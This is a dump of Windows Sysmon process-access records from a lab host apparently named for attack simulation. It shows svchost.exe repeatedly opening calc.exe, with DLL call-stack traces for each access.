22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360931Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360930Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360929Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360928Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360927Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360926Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360925Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360924Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360923Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360922Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360921Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360920Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360919Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360918Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360917Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360916Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360915Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360914Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360913Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360912Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360911Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.155{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 